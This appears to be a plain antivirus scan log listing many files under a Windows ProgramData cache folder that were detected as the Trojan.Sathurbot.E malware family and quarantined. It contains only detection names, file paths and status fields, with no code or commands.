Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\79c0273e316f7a0dc2dd98323942d7f1, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\7bc7a84ed845669c6eed879826be7fbc, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\7c416188c1a8b9f7a8ff4609a83e02b4, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\7cde92506819f51e710688643e7873e9, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\7dab3302070f8e886220313eae12694e, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\7dc7aa964a3778773926ce47d3ed6bc7, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\d689be2c56c9bef8cd92cf62e665ba1a, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\d83514de16706316d5a5f1caef8d2b36, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\d8f7b2e0e75b2750819e98aeabdb125d, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\daafc1ea4f1c3d7d6bcbbad50a4a8ea3, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\dd4971dcc1fffa4e94555637edd79abf, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\ddbecfa53bce79286cf9a44b4d6c6c90, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\de177bcd62fd5092202343daceab8714, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\de957e4f995aaddbf21a460ac6d6bf6d, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\df99cab0dad57776f1c2ff98e43905ba, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\e099fdbf84410511c0f424d389fc60a2, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\548509c4cb148f0dc069d61e4191e2d9, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\55608f6aefba4db7458a652a79a15c92, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\56b05055acf8caa94b019cad0d058ca3, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\573376c678cdf8388e8ca569e6a3f42b, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\577a157404a9c2bfa0ed3b91f432239c, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\580b8e805f78816a32ad46a2d30c4501, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\5ad8fa78eabe15893d3376c8c500e258, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\5afc95652210998bd40844db7075e204, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\a6dcba063d23763207581bb52dacb051, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\a6e8ba69ae6d2e1eaa905bca8e6d90ff, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\a72f77f761f89e309c894b03d2e7bd4c, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\ad8eefaf5286cbec0bb75eaf1b2ffb47, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\af5a4f550df3e39b45118d0d96b32d4d, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\af9461fa3a552f3ca0478dcfc0ac362a, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\b5becf525befbe03d39413cf887d1417, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\b6d721cc81888d2fc338219aee682db8, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\b993a99472521cbdaeeeb07bfbc5ef99, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\be57846cb109cd96783d9a09e8d76664, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\c14debd37305c8b9ee44aaba46212b4f, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\22501a12640e0d2eacdf764df1625909, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\22c18af08e624e272bd4f1ae69f33d99, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\2393dd19a8c1e641f1a6d74c8d2683f1, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\24487c94123c38ad51f71f3c5f17e6db, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\24956a069784f3ee4da71dc6b3b6709c, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\2513dc81a92b9c05964b6fb577b29a92, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\25856f397a70bac6d97a0590bb1daf27, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\2589dfd756006a29a162ca3059761bd6, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\26ba1fe505f5eb72eb8b08b07b9d2633, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\26def096d365a8ee4277c5319f81ab58, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\28d94aa8445f8afba3336edb1c27b14c, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\e112b9581d3d5ba2651112319eb4672d, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\ed39a6eb8cb42d567573ebdb6ca27c61, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\85524c5aa24a5a95e16b6e1c4cff571d, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\8758a28d48ed0a7839dc483fbd6f7129, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\88f798ca90cbd3179f8c504a8fd6a1af, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\8a1156fd41d78cd113ac0549e754baa2, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\8afb95ef0d1220d23b9623bffcb9ff57, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\8b609eedd6bb25c595cd09546420db93, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\8da3583b712916b4cac4f9f3f02fdaeb, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\9090ad3a074b1da3fdf2b2aab969e097, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\915c0ea71bd2103634fb93120059f2d0, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\920c265457f24c84dad5cc6f91f841e4, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\f132b912ea3f8097762b256293a9953a, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\f35e906c7e6c3b68f0285005195eec52, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\f751683de03ade9e0920b62cc8542e6e, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\f7bcab5dace78283b9f759005152de8d, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\f86dbdd379fae926a612a144d5ecce69, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\f97beeb0ed48210ef8858bff00bb7d18, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\f9b5675e6579d5e98b41312ae6345199, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\fa22a82b1df7b08df25803806bd9694f, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\faaee814b82c2a36f06e40af075cb5c1, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\fc7160b2565bdcc8382fa74e43495799, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\fd2c8238c0e8ea5bd3ea58d9470224f5, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\fe75751f0e65f636df55620338ed3cd1, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\fe9fbb1ce8e35f5400c89d9ce9f5db14, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\fefdd2265913197c649c88a119955d59, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\c5e7172ccbca5ee12ccec8dbfbb0a916, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\c7db0c3f907b23bfa8df0829534cc38e, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\ca5e0d1ed3240ff21f1ae59191855325, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\cc245c8e4392379c24dc19aa1df88b76, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\cc6b0cf1d835f721d67b8e62a3e764e5, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\cddb6acc16ff9137398363bbe03263de, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\ce09e7ac485e61a20d82d8fa43a506a3, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\cfe2d42980cc06cdf0bbfd4e6960915b, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\d031285af48b90962abac2afc48200b5, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\d04cb8eb0f0b9d030a0eae397e515d1a, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\d1a43a55c3bda34650bb9294a135abc2, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\d1eb47beb4f311fd481d357ab3456b07, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\d2bed49e2a2d86016d8993a01ab552d5, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\d2c89325d0d3f197b28dfd6d7b3c47dd, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\6794318076f8df2ddbbdd4ff7927f10a, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\67dedcd9029bac22b3f63083e26a814f, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\681d1c56fefdf5064964d65ffe5a6be3, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\682b108f4d7b74c1ad51b38ce08dcd5e, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\691fcacc02bc1047e58a2e80d2739b75, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\696acdc18471bad4e7424cb0996099cc, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\69e3c3a6e946adc33bfe8c0e961954a2, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\6a261f1464cdce0b33f8f4ecd1d1ddd4, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\6a3c00af9c87188194351bfb60e888a9, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\6a50c4bc3eadcd483eedf1b30935e613, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\6c5cb2fc9f84db9de134598a02912f6e, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\6cf1a4221dc6831c0b264d2888c75720, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\6d6351fb46b5fe461f13a94f6cb339ea, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\6dbdd2e5f83e8cca4603bb59843899d5, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\6e994f8d30ada5c4aed6d24b44b537ca, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\74b666ebf6a455763d405af8b4d798a7, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\3c1422ca03ba9542755cb7e8fd271330, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\3c9e79246325a3d103cd13657e07eb39, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\3cd8f1ad7174b0259114330ea573eb2c, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\3fd3c85733e1d00b4a694b5d187b6474, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\423156f65de615cf4d01c2c42eb03db1, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\437b623652da5458a6c67b00c53868f5, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\44c20a4c35790e24de6161561fdbb077, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\4678b4edab6ca6b6701cf31cf9568704, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\46d4977b73223dab65141204322efc51, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\941762a0c5862a72a0aa2c1995d754f8, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\95c9e8535d09b813fef20e7d0a371b31, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\95e95d42d69637efd05a05d594525553, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\965c44f802aeda450496a2811908ddbb, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\98aa80db2acbfe37a9f978c6b6c0920a, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\9a1ed8766c859a2a21ff3cba26f0b166, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\9bba2f1e69982976340996427e7778a0, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\9eb5b6e6ae69e3bc13cc76f94dd6fded, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\a1950e3528b0871ee6f1e0891096f785, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\a544aaf5c59dbfc473ac2e3ad7274d53, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\a5825cb12a9a21ab824c133c72022a90, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\a63c101ceef39a9d9ba8542329670eb6, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\183fb8947af66b4e00cfe938ccb4b40c, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\18927ccfded0d0bce2c25484315d2550, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\1bf8ddd876682be4149bc49e2386fa37, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\1ca0d14fa7448c8f80cd2be26548ab3d, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\1d3257c5e4c8f8afa1263428ef788e06, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\1e96dc0081d605db4607f655335d70f8, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\1f11c252718b0dceea8f4e6def7fbe79, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\20cf9543585b13f565de6ba5ba81b1fa, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\c1e5440a8ad280d66ce37cd683132035, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\c2515841ede50ad5241889b3a5239af1, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\c2ca803de5ea15aebc24dfb31e46ff88, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\c3334816313242fc3a4fcc7650a14d9d, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\c35c62bbfd5815621772ca046abafe5e, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\c3b439f57d05edb948574b50b8fa59fb, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\c3b69c6a946666dd8ca776ad800ff836, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\c4fcb2f1b6686cd04f82bcf02314f6ae, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\c569574822bef5c4d80349b4230032cd, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\7dee4e623d06c82f12da1b32d739e055, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\7e8f4bb2dce979fd6160cd928709b045, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\7f57ffcf705c68eb438cc6f35c7cc0a6, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\7f8f40c8cecb5de0ae30e927174121d3, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\80314d336e5581f4825c25bafd0b2f67, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\8071b2e0bda3117347f54c0380caa9be, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\82f6e91ee379a279953b0f5cc542f6b0, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\830a7e836dc5f626f298ba8f5f4ef5ab, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\83ae0e7e209219becd1e7bb3057b4a11, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\8518a46f9fcad1ca962b282ae0145c40, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\2abc6f3e0a5236dc6f62668ff5bc4e33, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\2af68deceeb5865b945c578b9ee63cc4, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\2c7c602718049c67e933ffa40e5da42e, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\2f1e4664911cc42c367ca2875ddb2ff9, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\330e3d5b4ae8d0b769873c425c01c913, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\3367a180a64bb4b31da2d6965f49c613, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\345dbb1e10eb304f47c293bbd8b06e5d, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\350faf47d3ddd37a10d22bd00961ec33, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\389bded36d89adf971ebc258373fa5cf, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\46f944387ed36384118d8623f6e1531b, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\483c4d526d59228c7d0d68d085fbe81a, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\492f2347112f091a4eb2e43788498cad, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\4b468578921d69825db9f3c80678664b, Quarantined, [2851], [355073],1.0.1064
Trojan.Sathurbot.E, C:\ProgramData\Microsoft\Performance\Monitor\SecurityCache\cache\4c7fc889b07f3fae40526a7f39ac34dd, Quarantined, [2851], [355073],1.0.1064
